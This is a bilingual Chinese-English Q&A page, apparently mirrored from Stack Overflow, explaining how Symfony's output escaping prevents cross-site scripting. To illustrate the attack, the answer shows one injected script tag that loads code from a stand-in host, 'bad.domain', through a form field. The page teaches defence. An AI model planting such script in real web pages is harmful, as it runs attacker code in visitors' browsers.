如何避免XSS攻击? [英] How can escaping be used to prevent XSS attacks?
问题描述
为了防止XSS攻击,输出
转义已启用;
To prevent XSS attacks, output escaping has been enabled;
以上来自symfony,但我不明白。
The above is from symfony,but I don't understand.
推荐答案
XSS是跨站脚本的缩写。当您设法将脚本(通常是JavaScript)隐藏到别人的网站上,可能会恶意运行时,会发生跨站点脚本攻击。
XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually javascript) onto someone else's website, where it can run maliciously.
当您有用户时,可以使用XSS输入到网站。例如,如果我填写了一个Web表单,并且询问我的名字,我可以输入我的名字是< script src =http://bad.domain/evilscript.js >< /脚本> 。如果我提交表单,然后在下一页,它要求我确认我的详细信息,并重新输出我输入的,我输入的讨厌的HTML标签将被渲染,脚本将被下载并由浏览器运行。
XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter My name is <script src="http://bad.domain/evilscript.js"></script>. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.
为了防止这种情况,您需要转义用户输入。转义意味着您转换(或标记)数据的关键字符,以防止在危险的上下文中解释。在HTML输出的情况下,您需要将< 和> 字符(等)转换为防止任何恶意HTML呈现。逃避这些角色包括将它们变成他们的实体等价物& lt; 和& gt; (见PHP的 htmlspecialchars()函数),这不会被浏览器解释为HTML标签。
In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the < and > characters (among others), to prevent any malcious HTML from rendering. Escaping these characters involves turning them into their entity equivalents < and > (see PHP's htmlspecialchars() function), which will not be interpreted as HTML tags by a browser.
Symfony正在尝试告诉你的是,它能够自动为您的输出执行此操作,并启用该功能。
What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.
这篇关于如何避免XSS攻击?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
